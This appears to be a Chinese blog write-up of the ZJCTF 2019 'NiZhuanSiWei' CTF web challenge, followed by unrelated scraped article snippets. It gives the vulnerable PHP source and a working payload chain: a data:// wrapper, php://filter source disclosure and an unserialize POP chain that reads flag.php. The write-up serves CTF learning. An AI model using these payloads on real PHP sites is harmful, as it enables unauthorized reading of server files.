Hillain
Hillain

[ZJCTF 2019]NiZhuanSiWei - 伪协议+文件包含+反序列化

[ZJCTF 2019]NiZhuanSiWei

  • 1 解题流程
    • 1.1 分析
    • 1.2 解题

[ZJCTF 2019]NiZhuanSiWei - 伪协议+文件包含+反序列化_第1张图片
题目源码:

 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "
".file_get_contents($text,'r')."

";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

1 解题流程

1.1 分析

1、get传text、file、password参数
2、file_get_contents($text,‘r’)的内容要等于welcome to the zjctf才能继续,我们又不知道哪个文件是这个内容,所以直接data伪协议传文件
3、file值不能包含flag
4、提示我们去包含useless.php(先看源码再包含)
5、password需要传递序列化数据(肯定有类给我们)

1.2 解题

  1. ?text=data://text/plain,welcome to the zjctf
  2. ?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php
    PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo

解码得到:
<?php  
	class Flag{  //flag.php  
	    public $file;  
	    public function __tostring(){  
	        if(isset($this->file)){  
	            echo file_get_contents($this->file); 
	            echo "
    "    ;
	        return ("U R SO CLOSE !///COME ON PLZ");
	        }  
	    }  
	}  
?>
  3. flag在flag.php中,我们的目标是toString的file_get_contents
    构造pop链
      
	class Flag{  //flag.php  
		public $file;  
		public function __tostring(){  
			if(isset($this->file)){  
				echo file_get_contents($this->file); 
				echo "
    "    ;
				return ("U R SO CLOSE !///COME ON PLZ");
			}  
		}  
	}  
	$f = new Flag();
	$f->file = "flag.php";
	echo serialize($f);
?>  
得到:O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
  4. payload=?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
    注意:此时file需要真正包含useless.php

你可能感兴趣的:(CTF-WEB,web安全,安全,ctf,php,伪协议,文件包含,反序列化)

  • mysql笔记17视图 程宇寒 mysql笔记视图
    mysql笔记17视图一、含义mysql5.1版本出现的新特性,本身是一个虚拟表,它的数据来自于表,通过执行时动态生成。好处:1、简化sql语句2、提高了sql的重用性3、保护基表的数据,提高了安全性二、创建createview视图名as查询语句;三、修改方式一:createorreplaceview视图名as查询语句;方式二:alterview视图名as查询语句四、删除dropview视图1,视
  • php简单分页 新世界的冒险
    公共文件common.php学生信息管理中心.pagelista,.pagelistspan{display:inline-block;padding:5px10px;border:1pxsolid#ddd;margin:03px;text-decoration:none;}.pagelistspan{color:red;border-color:red;}学生信息管理中心编号姓名年龄性别学历爱好
  • 《问心》赵又廷和毛晓彤竟然是兄妹 青瑶说
    《问心》是由黎志导演周艺飞编剧的医疗题材的剧,这部剧主要讲述了周筱风,方筱然林逸三位心脏科医生从最开始的相互不服气和看不惯到后来的相互欣赏,一起并肩作战的故事。01作为一部医疗题材的剧这部剧更加聚焦的矛盾在于,医院的规章制度和病人生命安全之间的度量衡,不同品性医生在相互合作中意见不合的处境。最典型的就是张雨熙的案例,正在工作的她突然倒下,被紧急送往医院。当时林逸判断是A型主动脉夹层,但是还需要拍片
  • 戴尔R750XS服务器Windows Server 2012 R2 管理员密码忘记,如何解决? bug菌¹ 全栈Bug调优(实战版)服务器windows运维
    本文收录于《全栈Bug调优(实战版)》专栏,主要记录项目实战过程中所遇到的Bug或因后果及提供真实有效的解决方案,希望能够助你一臂之力,帮你早日登顶实现财富自由;同时,欢迎大家关注&&收藏&&订阅!持续更新中,up!up!up!!备注:部分问题/疑难杂症搜集于互联网。全文目录:问题描述解决方案(请知悉:如下方案不保证一定适配你的问题)1.**通过“安全模式”重置管理员密码**2.**使用Windo
  • Node.js特训专栏-实战进阶:16. RBAC权限模型设计 爱分享的程序员 Node.jsnode.js安全算法前端
    欢迎来到Node.js实战专栏!在这里,每一行代码都是解锁高性能应用的钥匙,让我们一起开启Node.js的奇妙开发之旅!Node.js特训专栏主页专栏内容规划详情我将从RBAC权限模型的基础概念、核心组件讲起,详细阐述其设计原则、数据库模型设计,还会结合代码示例展示在实际开发中的实现方式,以及探讨模型的扩展与优化。RBAC权限模型设计:从理论到实战的完整方案在现代应用系统中,权限管理是保障数据安全
  • iOS如何查看电池容量?理解系统限制与开发者级能耗调试方法 2501_91590906 ios小程序uni-appiphoneandroidwebviewhttps
    在很多Android设备中,查看电池的容量、温度、电压甚至充放电速度,几乎不需要任何操作。但在iOS设备上,这些信息却要么不可见,要么非常隐晦。对用户来说,“电池最大容量87%”是一句看似清晰却又缺乏上下文的信息;对开发者来说,更需要知道的是:“我的App是否在某些设备上引发了异常耗电?”这篇文章不只是告诉你如何查电池容量,更是帮助你理解iOS的能耗监测边界,和如何在苹果生态内构建安全、有效的电池
  • iOS 抓包工具选择与配置指南 从零基础到高效调试的完整流程 HTTPwise ios小程序uni-appiphoneandroidwebviewhttps
    iOS抓包:复杂网络调试的必要技能随着移动端应用越来越依赖网络交互,iOS抓包作为核心调试工具之一,变得尤为重要。无论是调试App与后端的接口通信、排查HTTPS请求加密问题,还是定位网络连接超时、请求异常,抓包都能在关键时刻提供有效支持。然而,iOS系统的封闭性与安全机制,往往让开发者在调试过程中碰壁:证书无法安装:系统严格的证书信任机制使得常规抓包工具很难直接抓取HTTPS请求。无法配置代理:
  • 基于 Python/PHP/Node.js 的淘宝 API 商品数据抓取开发教程
    在电商数据分析、竞品监控等场景中,抓取淘宝商品数据是常见需求。淘宝开放平台(OpenPlatform)提供了标准化的API接口,通过合法途径调用可高效获取商品信息。本文将分别基于Python、PHP、Node.js三种语言,详解淘宝API商品数据抓取的开发流程,并提供完整代码示例。一、淘宝API准备工作在开发前,需完成以下准备步骤:注册开发者账号访问注册账号并完成实名认证,创建应用(应用类型选择“
  • 【iOS】源码阅读(六)——方法交换 名字不要太长 像我这样就好 ioscocoamacos开发语言objective-c
    文章目录方法交换什么是Method-Swizzling方法交换核心API**1.获取方法对象****2.添加/替换方法实现****3.交换方法实现****4.获取方法信息****5.修改方法实现****使用示例:完整的Method-Swizzling流程****注意事项**使用方法交换注意事项线程安全方法交换的影响范围方法交换什么是Method-Swizzling  Method-Swizzlin
  • Github 2024-06-07开源项目日报 Top10
    根据GithubTrendings的统计,今日(2024-06-07统计)共有10个项目上榜。根据开发语言中项目的数量,汇总情况如下:开发语言项目数量Python项目3C++项目3JavaScript项目2JupyterNotebook项目1TypeScript项目1Vue项目1比特币核心:开源比特币软件创建周期:4919天开发语言:C++协议类型:MITLicenseStar数量:76760个F
  • 密码管理安全防御
    密码管理是信息安全的核心环节,其目标是通过规范密码的生成、存储、传输、验证和生命周期管理,防止未授权访问,保护用户账号和系统资源的安全。以下从核心原则、技术实践、常见问题及解决方案等方面详细说明:一、密码管理的核心原则密码管理需遵循“安全性”与“可用性”的平衡,核心原则包括:复杂性原则密码需足够复杂以抵御暴力破解(如字典攻击、brute-force攻击)。通常要求:长度至少10-12位(越长越安全
  • 博客摘录「 华为云平台-FusionSphere OpenStack 8.2.1 系统加固」2025年7月15日
    编号加固项"风险等级"加固原理/Rationale审计方法/Audit期望结果/ExpectResults加固方法/Remediation1OpenSSH加固配置1.1OpenSSH加固配置1.1.1SSH使用的版本H"OpenSSHV2版本在安全性能、方便性上有所提高,默认使用V2版本。如果用户根据实际需要采用V1版本,可登录主机将数值修改为“1”。"查看/etc/ssh/sshd_config
  • 婚姻本质上讲,就是一场合作关系 一只神奇的做设计小姐姐
    其实婚姻本质上讲,就是一场合作关系。就如《奇葩说》里的经济学家薛兆丰所讲:“结婚,就是双方拿出自己的资源,一起办家庭企业,签的是终身批发的期货合同。也许每个人的资源不一样,作用不一样,功效不一样,但一定是互相出力,实现双赢。”尤其对女性而言,想要靠结婚,得到一份终生依靠,得到一辈子的安全感,得到精神的依附,这是一件绝对不可能的事。有几句话很扎心,但很实在。那就是:其实你的另一半,也嫌你穷。其实男人
  • 工业喷涂机器人的革新:艾利特协作机器人引领人机交互新纪元 lingling009 人工智能运维大数据
    将复杂技术转化为实际价值,赋能全球产业生态在工业自动化浪潮中,喷涂作业作为关键制造环节,长期面临效率低下、质量波动和安全隐患等痛点。艾利特机器人,作为专注新一代人机交互协作场景的制造商和迅速成长的国际协作机器人龙头企业之一,致力于通过一站式解决方案,深度升级汽车、3C、新能源等行业生态。本文将基于“工业喷涂机器人”这一核心场景,剖析其痛点、转化技术参数为可感知价值,并植入真实案例,构建“基础功能→
  • eVTOL分布式电推进(DEP)适航审定探究 北京航通天下科技有限公司 低空经济eVTOL测试配套分布式
    从适航认证的角度来看,eVTOL动力系统采用分布式电推进(DEP)技术进行测试具有以下显著优势:一、提升系统冗余性与故障容限分布式电推进系统通过多个独立电机协同工作,即使部分电机失效,剩余电机仍能维持推力,保障飞行安全。这种冗余设计是适航认证中对关键系统可靠性要求的核心指标之一。例如,测试平台可模拟单个或多个电机故障场景,验证系统能否通过动态推力分配维持稳定飞行,从而满足适航对“故障安全”原则的要
  • 【ESP32设备通信】-ESP-Now多对一通信 视觉与物联智能 物联网全栈开发实战ESP32单片机ESPNow嵌入式硬件物联网网络
    ESP-Now多对一通信文章目录ESP-Now多对一通信1、ESP-Now通信协议介绍2、硬件准备3、代码实现3.1查询MAC地址3.2发送方代码实现3.3接收方代码实现在本文中,我们将了解如何使用ESP-NOW和ArduinoIDE从多块ESP32板向一块ESP32板发送数据。换句话说,我们将从多块ESP32板向一块ESP32板传输数据(多对一通信)。之前,我们通过ESP-NOW单向通信将数据从
  • DHCP与DHCP中继--原理与配置--华为实验--配置接口模式、全局模式以及中继模式
    文章目录一、DHCP1.概述2.优点3.应用4.交互过程5.配置方法5.1接口模式5.2全局模式二、DHCP中继1.应用场景2.工作原理3.配置DHCP中继服务器4.配置DHCP服务器三、接口模式配置拓扑图R1PC四、全局模式拓扑图R1PC五、中继模式拓扑图R1R2R3PC一、DHCP1.概述DHCP(DynamicHostConfigurationProtocol,动态主机配置协议)是一个局域网
  • 2个网卡配置相同ip 华为交换机_网络工程师必会知识点(上篇):华为交换机绑定客户端IP+MAC+端口... 882看看 2个网卡配置相同ip华为交换机
    交换机绑定客户端IP+MAC+端口,主要是为了防止别人没有授权的条件下,随意加入到网络当中操作,为了防止这种不安全的行为的出现,为了我们网络的安全,可以绑定授权的IP以及MAC,这样一来就不会出现IP地址被盗用出现网络安全威胁的情况。DHCPSnooping是DHCP的一种安全特性,主要应用在交换机上,作用是屏蔽接入网络中的非法的DHCP服务器。即开启DHCPSnooping功能后,网络中的客户端
  • 对象存储和文件存储之间的区别?
    数据信息存储功能对于企业来说是十分重要的,企业会将业务中的数据存放在一个安全的位置,避免其受到网络攻击或损坏,给企业造成一定的经济损失,而在存储方面有文件存储、对象存储和块存储等多种方式,本文就来为大家介绍一下对象存储和文件存储之间的区别!对象存储是被称为基于对象的存储技术,主要是针对离散单元的处理和解决方式,其中对象可以是指任何形式的数据信息,比如文件信息和视频图片等,能够通过唯一ID访问数据对
  • 轻松拿捏Anaconda安装,Python开发快人一步 奔跑吧邓邓子 必备核心技能python开发语言Anaconda科学计算
    目录一、Anaconda是什么1.1包管理与环境管理1.2预装丰富的科学计算库二、为什么选择Anaconda2.1简化依赖管理2.2避免版本冲突2.3丰富的库资源2.4适合的应用场景三、安装前准备3.1确认系统要求3.2下载安装包四、Windows系统安装步骤4.1运行安装程序4.2许可协议4.3选择安装类型4.4选择安装路径4.5高级选项4.6安装完成五、MacOS系统安装步骤5.1下载安装包5
  • BGP服务器该如何处理不同的路由策略? wanhengidc 服务器运维
    BGP(边界网关协议)是现在互联网社会中的重要基石,主要功能是在不同的自治系统之间交换路由信息,为了能够保障数据流畅稳定的传输,BGP服务器需要对于各种路由策略进行灵活的处理,那么对于不同的路由策略BGP服务器该怎样进行处理呢?BGP服务器在运行的过程中,在选择最佳的路由路径时会考虑到多个属性,BGP会优先选择具有最高本地优先级的路由,当多个路由都具有相同的优先级,则会优先选择经过最少自治系统的路
  • 灰度发布实战:在生产环境中安全迭代功能 荣华富贵8 程序员的知识储备2程序员的知识储备3consul服务发现算法网络wpf
    摘要随着互联网服务规模的不断扩大,如何在保证系统稳定性和用户体验的前提下快速迭代新功能,已经成为大型分布式系统运维和开发团队面临的核心挑战。灰度发布(GreyRelease或CanaryRelease)作为一种渐进式发布策略,通过对少量用户或流量进行新版本试运行,实时监控关键指标、收集用户反馈,从而在生产环境中实现安全的功能迭代和风险管控。本文以某大型电商平台灰度发布实战为例,深入探讨技术原理、系
  • 大白话讲【2】DHCP服务器配置 学习向前冲 服务器运维网络华为
    DHCP动态主机配置协议是应用层协议;作用是分配IP地址,子网掩码,网关地址和DNS(可设置IP地址租期等)DHCP服务器可以是路由器,三交换机,Windowsserver2016(后续编写),linux服务器(后续编写)1.三层交换机上搭DHCP服务器1.1在三层交换机开启DHCP功能sy[Huawei]dhcpenable1.2创建地址池[Huawei]ippolicy-based-route
  • ARM芯片的侧信道攻击防御:从理论到代码实践
    引言在物联网(IoT)、智能卡和工业控制系统中,ARM芯片因其高性能和低功耗被广泛应用。然而,这些设备的安全性常常面临一个隐形威胁:侧信道攻击(Side-ChannelAttack,SCA)。攻击者无需侵入芯片内部,仅通过分析功耗、电磁辐射或执行时间等物理信号,即可窃取敏感数据(如加密密钥)。本文将深入解析侧信道攻击的原理,并结合ARM芯片特性,从理论到代码实践,提供一套可落地的防御方案。一、侧信
  • Linux五大网络IO模型 Acto
    一、须知对于操作系统来说,空间会分为用户空间与内核空间用户空间:用户程序的运行空间。为了安全,它们是隔离的,即使用户的程序崩溃,内核也不会受到影响。只能执行简单的运算,不能直接调用系统资源,必须通过系统接口(systemcall),才能向内核发出指令。内核空间:这是Linux内核的运行空间,可以执行任意命令,调用系统的一切资源通过用户空间访问系统空间并让其帮助我们完成我们所需要执行的操作或者任务二
  • 《用上位机控制无人机:Python+MAVLink协议飞行实验》 欧振芳 python
    1.实验目标-通过Python编写的上位机程序,基于MAVLink协议控制无人机(如PX4/ArduPilot固件的无人机)。-实现基础飞行指令:解锁、起飞、悬停、降落。-探索MAVLink消息的构造与解析机制。2.实验环境准备硬件-无人机硬件:支持MAVLink协议的飞控(如Pixhawk系列)。-通信链路:USB直连、数传电台(3DRRadio)或WiFi(如通过UDP)。-安全环境:空旷无干
  • 经典人生语录,为了自己想过的生活,勇于放弃一些东西 然若一
    为了自己想过的生活,勇于放弃一些东西。这个世界没有公正之处,你也永远得不到两全之计。若要自由,就得牺牲安全。若要闲散,就不能获得别人评价中的成就。若要愉悦,就无需计较身边人给予的态度。若要前行,就得离开你现在停留的地方。多微笑,做一个开朗热忱的女人;多打扮,做一个美丽优雅的女人;多倾听,做一个温柔善意的女人,多看书,做一个淡定内涵的女人;多思考,做一个聪慧冷静的女人。记住为自己而进步,而不是为了满
  • 21天【财富自由挑战赛】 南一弯弯
    我理解的财富自由是什么?我理解的财富自由,并不是天天啥都不干,躺着收钱,而是做着自己热爱并喜欢的工作,赚钱养活自己,让自己和家人过上体面的生活。我为什么发起财富自由挑战赛?那你为什么还在忍受这份并不太喜欢的工作?通勤时间长、工作压力大、老板脾气暴躁……不喜欢工作,不想上班。但你之所以还没有勇气放弃,是因为“恐惧”,恐惧没有稳定的收入,恐惧没有安全感。我发觉很多人恐惧的源头都或多或少与“钱”有关系。
  • 前端安全指南:防御XSS与CSRF攻击 天天进步2015 前端开发前端安全xss
    引言随着互联网的快速发展,Web应用安全问题日益突出。作为前端开发者,了解常见的安全威胁及其防御措施至关重要。本文将重点介绍两种最常见的前端安全威胁:跨站脚本攻击(XSS)和跨站请求伪造(CSRF),并提供实用的防御策略。XSS攻击解析什么是XSS攻击?XSS(Cross-SiteScripting,跨站脚本)攻击是一种注入类型的攻击,攻击者通过在目标网站上注入恶意脚本代码,当用户浏览该页面时,恶
  • 揭秘网络通信:数据传输的完整流程解析
    网络通信是一个复杂但高度结构化的过程,涉及多个层次和协议的协作。以下是其核心原理和步骤的详细解析:1.网络通信的分层模型网络通信基于分层架构(如OSI七层模型或TCP/IP四层模型),每一层专注于特定功能,确保数据可靠传输:OSI模型TCP/IP模型功能应用层应用层提供用户接口(如HTTP、FTP、DNS)。表示层—数据格式转换(如加密、压缩)。会话层—建立、管理会话(如RPC、SQL)。传输层传
  • 如何用ruby来写hadoop的mapreduce并生成jar包 wudixiaotie mapreduce
    ruby来写hadoop的mapreduce,我用的方法是rubydoop。怎么配置环境呢: 1.安装rvm:     不说了 网上有 2.安装ruby:     由于我以前是做ruby的,所以习惯性的先安装了ruby,起码调试起来比jruby快多了。 3.安装jruby:     rvm install jruby然后等待安
  • java编程思想 -- 访问控制权限 百合不是茶 java访问控制权限单例模式
    访问权限是java中一个比较中要的知识点,它规定者什么方法可以访问,什么不可以访问   一:包访问权限;   自定义包: package com.wj.control; //包 public class Demo { //定义一个无参的方法 public void DemoPackage(){ System.out.println("调用
  • [生物与医学]请审慎食用小龙虾 comsci 生物
         现在的餐馆里面出售的小龙虾,有一些是在野外捕捉的,这些小龙虾身体里面可能带有某些病毒和细菌,人食用以后可能会导致一些疾病,严重的甚至会死亡.....      所以,参加聚餐的时候,最好不要点小龙虾...就吃养殖的猪肉,牛肉,羊肉和鱼,等动物蛋白质     
  • org.apache.jasper.JasperException: Unable to compile class for JSP: 商人shang maven2.2jdk1.8
    环境: jdk1.8    maven  tomcat7-maven-plugin  2.0 原因: tomcat7-maven-plugin  2.0 不知吃 jdk 1.8,换成 tomcat7-maven-plugin  2.2就行,即     <plugin>
  • 你的垃圾你处理掉了吗?GC oloz GC
    前序:本人菜鸟,此文研究学习来自网络,各位牛牛多指教  1.垃圾收集算法的核心思想   Java语言建立了垃圾收集机制,用以跟踪正在使用的对象和发现并回收不再使用(引用)的对象。该机制可以有效防范动态内存分配中可能发生的两个危险:因内存垃圾过多而引发的内存耗尽,以及不恰当的内存释放所造成的内存非法引用。   垃圾收集算法的核心思想是:对虚拟机可用内存空间,即堆空间中的对象进行识别
  • shiro 和 SESSSION 杨白白 shiro
    shiro 在web项目里默认使用的是web容器提供的session,也就是说shiro使用的session是web容器产生的,并不是自己产生的,在用于非web环境时可用其他来源代替。在web工程启动的时候它就和容器绑定在了一起,这是通过web.xml里面的shiroFilter实现的。通过session.getSession()方法会在浏览器cokkice产生JESSIONID,当关闭浏览器,此
  • 移动互联网终端 淘宝客如何实现盈利 小桔子 移動客戶端淘客淘寶App
           2012年淘宝联盟平台为站长和淘宝客带来的分成收入突破30亿元,同比增长100%。而来自移动端的分成达1亿元,其中美丽说、蘑菇街、果库、口袋购物等App运营商分成近5000万元。 可以看出,虽然目前阶段PC端对于淘客而言仍旧是盈利的大头,但移动端已经呈现出爆发之势。而且这个势头将随着智能终端(手机,平板)的加速普及而更加迅猛
  • wordpress小工具制作 aichenglong wordpress小工具
    wordpress 使用侧边栏的小工具,很方便调整页面结构 小工具的制作过程 1 在自己的主题文件中新建一个文件夹(如widget),在文件夹中创建一个php(AWP_posts-category.php) 小工具是一个类,想侧边栏一样,还得使用代码注册,他才可以再后台使用,基本的代码一层不变 <?php class AWP_Post_Category extends WP_Wi
  • JS微信分享 AILIKES js
    // 所有功能必须包含在 WeixinApi.ready 中进行    WeixinApi.ready(function(Api) {        // 微信分享的数据            var wxData = {       &nb
  • 封装探讨 百合不是茶 JAVA面向对象 封装
    //封装   属性 方法 将某些东西包装在一起,通过创建对象或使用静态的方法来调用,称为封装;封装其实就是有选择性地公开或隐藏某些信息,它解决了数据的安全性问题,增加代码的可读性和可维护性   在 Aname类中申明三个属性,将其封装在一个类中:通过对象来调用   例如   1: //属性 将其设为私有 姓名 name 可以公开
  • jquery radio/checkbox change事件不能触发的问题 bijian1013 JavaScriptjquery
    我想让radio来控制当前我选择的是机动车还是特种车,如下所示:  <html> <head> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js" type="text/javascript"><
  • AngularJS中安全性措施 bijian1013 JavaScriptAngularJS安全性XSRFJSON漏洞
            在使用web应用中,安全性是应该首要考虑的一个问题。AngularJS提供了一些辅助机制,用来防护来自两个常见攻击方向的网络攻击。 一.JSON漏洞         当使用一个GET请求获取JSON数组信息的时候(尤其是当这一信息非常敏感,
  • [Maven学习笔记九]Maven发布web项目 bit1129 maven
    基于Maven的web项目的标准项目结构 user-project     user-core     user-service     user-web        src      
  • 【Hive七】Hive用户自定义聚合函数(UDAF) bit1129 hive
    用户自定义聚合函数,用户提供的多个入参通过聚合计算(求和、求最大值、求最小值)得到一个聚合计算结果的函数。 问题:UDF也可以提供输入多个参数然后输出一个结果的运算,比如加法运算add(3,5),add这个UDF需要实现UDF的evaluate方法,那么UDF和UDAF的实质分别究竟是什么?   Double evaluate(Double a, Double b)  
  • 通过 nginx-lua 给 Nginx 增加 OAuth 支持 ronin47
    前言:我们使用Nginx的Lua中间件建立了OAuth2认证和授权层。如果你也有此打算,阅读下面的文档,实现自动化并获得收益。SeatGeek 在过去几年中取得了发展,我们已经积累了不少针对各种任务的不同管理接口。我们通常为新的展示需求创建新模块,比如我们自己的博客、图表等。我们还定期开发内部工具来处理诸如部署、可视化操作及事件处理等事务。在处理这些事务中,我们使用了几个不同的接口来认证: &n
  • 利用tomcat-redis-session-manager做session同步时自定义类对象属性保存不上的解决方法 bsr1983 session
    在利用tomcat-redis-session-manager做session同步时,遇到了在session保存一个自定义对象时,修改该对象中的某个属性,session未进行序列化,属性没有被存储到redis中。 在 tomcat-redis-session-manager的github上有如下说明: Session Change Tracking As noted in the &qu
  • 《代码大全》表驱动法-Table Driven Approach-1 bylijinnan java算法
    关于Table Driven Approach的一篇非常好的文章: http://www.codeproject.com/Articles/42732/Table-driven-Approach package com.ljn.base; import java.util.Random; public class TableDriven { public
  • Sybase封锁原理 chicony Sybase
           昨天在操作Sybase IQ12.7时意外操作造成了数据库表锁定,不能删除被锁定表数据也不能往其中写入数据。由于着急往该表抽入数据,因此立马着手解决该表的解锁问题。     无奈此前没有接触过Sybase IQ12.7这套数据库产品,加之当时已属于下班时间无法求助于支持人员支持,因此只有借助搜索引擎强大的
  • java异常处理机制 CrazyMizzz java
    java异常关键字有以下几个,分别为 try catch final throw throws 他们的定义分别为 try:    Opening exception-handling statement. catch:  Captures the exception. finally: Runs its code before terminating
  • hive 数据插入DML语法汇总 daizj hiveDML数据插入
    Hive的数据插入DML语法汇总1、Loading files into tables语法:1) LOAD DATA [LOCAL] INPATH 'filepath' [OVERWRITE] INTO TABLE tablename [PARTITION (partcol1=val1, partcol2=val2 ...)]解释:1)、上面命令执行环境为hive客户端环境下: hive>l
  • 工厂设计模式 dcj3sjt126com 设计模式
      使用设计模式是促进最佳实践和良好设计的好办法。设计模式可以提供针对常见的编程问题的灵活的解决方案。 工厂模式 工厂模式(Factory)允许你在代码执行时实例化对象。它之所以被称为工厂模式是因为它负责“生产”对象。工厂方法的参数是你要生成的对象对应的类名称。 Example #1 调用工厂方法(带参数) <?phpclass Example{ 
  • mysql字符串查找函数 dcj3sjt126com mysql
      FIND_IN_SET(str,strlist) 假如字符串str 在由N 子链组成的字符串列表strlist 中,则返回值的范围在1到 N 之间。一个字符串列表就是一个由一些被‘,’符号分开的自链组成的字符串。如果第一个参数是一个常数字符串,而第二个是type SET列,则   FIND_IN_SET() 函数被优化,使用比特计算。如果str不在strlist 或st
  • jvm内存管理 easterfly jvm
    一、JVM堆内存的划分 分为年轻代和年老代。年轻代又分为三部分:一个eden,两个survivor。 工作过程是这样的:e区空间满了后,执行minor gc,存活下来的对象放入s0, 对s0仍会进行minor gc,存活下来的的对象放入s1中,对s1同样执行minor gc,依旧存活的对象就放入年老代中; 年老代满了之后会执行major gc,这个是stop the word模式,执行
  • CentOS-6.3安装配置JDK-8 gengzg centos
    JAVA_HOME=/usr/java/jdk1.8.0_45 JRE_HOME=/usr/java/jdk1.8.0_45/jre PATH=$PATH:$JAVA_HOME/bin:$JRE_HOME/bin CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib export JAVA_HOME
  • 【转】关于web路径的获取方法 huangyc1210 Web路径
    假定你的web application 名称为news,你在浏览器中输入请求路径:  http://localhost:8080/news/main/list.jsp  则执行下面向行代码后打印出如下结果:  1、 System.out.println(request.getContextPath()); //可返回站点的根路径。也就是项
  • php里获取第一个中文首字母并排序 远去的渡口 数据结构PHP
    很久没来更新博客了,还是觉得工作需要多总结的好。今天来更新一个自己认为比较有成就的问题吧。 最近在做储值结算,需求里结算首页需要按门店的首字母A-Z排序。我的数据结构原本是这样的: Array ( [0] => Array ( [sid] => 2885842 [recetcstoredpay] =&g
  • java内部类 hm4123660 java内部类匿名内部类成员内部类方法内部类
          在Java中,可以将一个类定义在另一个类里面或者一个方法里面,这样的类称为内部类。内部类仍然是一个独立的类,在编译之后内部类会被编译成独立的.class文件,但是前面冠以外部类的类名和$符号。内部类可以间接解决多继承问题,可以使用内部类继承一个类,外部类继承一个类,实现多继承。      &nb
  • Caused by: java.lang.IncompatibleClassChangeError: class org.hibernate.cfg.Exten zhb8015
    maven pom.xml关于hibernate的配置和异常信息如下,查了好多资料,问题还是没有解决。只知道是包冲突,就是不知道是哪个包....遇到这个问题的分享下是怎么解决的。。   maven pom:   <dependency> <groupId>org.hibernate</groupId> <ar
  • Spark 性能相关参数配置详解-任务调度篇 Stark_Summer sparkcachecpu任务调度yarn
    随着Spark的逐渐成熟完善, 越来越多的可配置参数被添加到Spark中来, 本文试图通过阐述这其中部分参数的工作原理和配置思路, 和大家一起探讨一下如何根据实际场合对Spark进行配置优化。   由于篇幅较长,所以在这里分篇组织,如果要看最新完整的网页版内容,可以戳这里:http://spark-config.readthedocs.org/,主要是便
  • css3滤镜 wangkeheng htmlcss
    经常看到一些网站的底部有一些灰色的图标,鼠标移入的时候会变亮,开始以为是js操作src或者bg呢,搜索了一下,发现了一个更好的方法:通过css3的滤镜方法。 html代码: <a href='' class='icon'><img src='utv.jpg' /></a> css代码: .icon{-webkit-filter: graysc
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他